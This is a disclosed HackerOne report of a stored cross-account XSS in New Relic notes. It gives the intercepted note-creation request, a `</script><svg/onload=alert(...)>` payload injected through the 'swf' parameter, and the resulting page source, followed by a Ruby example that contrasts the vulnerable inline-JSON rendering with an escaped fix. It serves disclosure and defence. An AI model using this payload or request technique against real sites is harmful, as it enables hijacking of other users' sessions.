New Relic: Cross-account stored XSS at notes (through "swf" note parameter)

2019-10-09T14:11:30
ID H1:710535
Type hackerone
Reporter skavans
Modified 2020-08-13T11:05:56

Description

Hey team,

I've found one more stored XSS, this one is inside a note. Since notes can be published so that they are available to any NR user (cross-account), the impact is quite severe. You can see the publicly-available payload here: https://rpm.newrelic.com/public/notes/4qovMmDXV7P {F603334}

Steps to reproduce

1) Sign into NR
2) Navigate to some app (APM, mobile, etc.)
3) Choose any chart that can be embedded into a note, click Add to note, then click Save and close, and intercept the request with Burp Suite. It looks like the following:

```http
POST /accounts/2385914/notes?agent_id=173790664 HTTP/1.1
Host: rpm.newrelic.com
<redacted>

utf8=%E2%9C%93&authenticity_token=ebHrvqEzOZ9Aj%2BffyB6%2FoAOPe7ecrKlb7kyTJVeO7HY%3D&app_name=newapp&note_item%5Bswf%5D=&note_item%5Bbegin_time%5D=2019-10-08T07%3A00%3A45-07%3A00&note_item%5Bend_time%5D=2019-10-09T07%3A00%3A45-07%3A00&note_item%5Btitle%5D=Apdex+score&note_item%5Bdata_url%5D=%2Fchart_data%2Fbase_charts%2Fcombined_apdex_rainbow.json%3Faccount_id%3D2385914%26agent%3D173790664%26application_id%3D173790664%26chartBottomMargin%3D55%26chart_type%3DMSLine%26current_product%3Dapm_product%26hideXAxisLabels%3Dtrue%26include_metric_guids%255B%255D%3D5b224170646578225d%26include_metric_guids%255B%255D%3D5b22456e64557365722f4170646578225d%26labelStep%3D3%26live%3Dtrue%26no_click%3Dfalse%26number_suffix%3D%26omit_markers%3Dtrue%26render_to%3Dcurrent_apdex_score_173790664%26title%3D%26tooltipGroup%3Dcurrent_charts%26tw%255Bdur%255D%3Dlast_24_hours%26tw%255Bend%255D%3D1570629645%26zoom%3Dtrue%26no_click%3D1%26no_links%3D1&note_item%5Bcontext_url%5D=%2Faccounts%2F2385914%2Fapplications%2F173790664%3Ftw%255Bdur%255D%3Dlast_24_hours&note_item%5Bnote_text%5D=&note_action=create&note_id=6621&action_after=save_and_close
```

4) Add the following parameter to the intercepted request (you can add it after all other parameters, for instance):

```
&note_item%5Bswf%5D=</script><svg/onload=alert(document.domain)>
```

5) The server response contains the created note ID. Navigate to this note: https://rpm.newrelic.com/accounts/<ACC_ID>/notes/<NOTE_ID> and make sure the payload is executed.
6) Inspect the page source and make sure the payload is injected inside the following script:

```html
<script type="text/javascript">
  jQuery(function($) {
    var chart_options = {"swf":"</script><svg/onload=alert(document.domain)>WorldwithCountries","width":"100%","height":200,"fluid":true,"snappable":false,"loadingOverlay":true,"render":true};
    chart_options.dataUrl = '/accounts/2385914/notes/6625/items/19898/chart_data?tw%5Bdur%5D=last_24_hours&tw%5Bend%5D=1570629645';
    $('#div_chart_note_item_19898_chart').chart(chart_options);
  });
</script>
```

7) You can also publish this note and make sure that the payload is also active in the public note version.
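The root cause visible in step 6 is JSON being interpolated into an inline `<script>` body without escaping for the HTML context: the HTML tokenizer ends the element at the first `</script` it sees, regardless of JavaScript string quoting, so the rest of the "string" is parsed as markup. The following is an added example written for this page (it is not the reporter's code and not New Relic's code) showing the vulnerable rendering pattern beside a hardened one. It is in Ruby because the request shape (`authenticity_token`, `note_item[swf]`) is the Rails convention, an assumption on my part; the `chart_options` hash is constructed from the page source above, and the function names are hypothetical.

```ruby
require 'json'

# Constructed chart options mirroring the shape seen in the report's page
# source. "swf" is where the attacker-controlled note_item[swf] value lands.
CHART_OPTIONS = {
  "swf"    => "</script><svg/onload=alert(document.domain)>WorldwithCountries",
  "width"  => "100%",
  "height" => 200,
  "fluid"  => true,
}.freeze

# Vulnerable pattern (matches what the report's page source shows): the JSON
# text is dropped straight into an inline <script>. JSON.generate does not
# escape "<" or "/", so the literal "</script>" survives and closes the element.
def render_chart_script_vulnerable(options)
  "<script type=\"text/javascript\">\n" \
  "var chart_options = #{JSON.generate(options)};\n" \
  "</script>"
end

# Hardened pattern: rewrite the characters that matter to the HTML parser as
# JSON \u escapes. The result is still valid JSON (JSON.parse yields the same
# strings), but the tokenizer never sees a "</script" sequence. U+2028/U+2029
# are escaped too: they are line terminators in JavaScript but plain
# whitespace in JSON. This is the same idea as Rails' ERB::Util.json_escape,
# implemented here directly so the block runs with only the standard library.
JSON_ESCAPE = {
  "<"      => '\u003c',
  ">"      => '\u003e',
  "&"      => '\u0026',
  "\u2028" => '\u2028',
  "\u2029" => '\u2029',
}.freeze

def json_escape(json_text)
  json_text.gsub(/[<>&\u2028\u2029]/) { |ch| JSON_ESCAPE[ch] }
end

def render_chart_script_hardened(options)
  "<script type=\"text/javascript\">\n" \
  "var chart_options = #{json_escape(JSON.generate(options))};\n" \
  "</script>"
end

# Review/test helper: does the inline script body contain a tag-closing
# sequence? Per the HTML spec's script-data tokenizer state, "</script"
# terminates the element even inside a JavaScript string literal.
def script_breakout?(html)
  body = html[/<script[^>]*>(.*)<\/script>/m, 1] || ""
  body.downcase.include?("</script")
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable breakout: #{script_breakout?(render_chart_script_vulnerable(CHART_OPTIONS))}"
  puts "hardened breakout:   #{script_breakout?(render_chart_script_hardened(CHART_OPTIONS))}"
end
```

The escaping is applied to the serialized JSON text, not to the individual values, so it covers every key and string in the object at once; in a Rails view the equivalent is `json_escape(options.to_json)` (or the `j`/`escape_javascript` helper, depending on whether the value sits in a JSON literal or a JS string). The `script_breakout?` check is the kind of assertion a template test can run over rendered output to catch this class of regression without a browser.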

PoC video:

{F603345}

Impact

Cross-account active stored XSS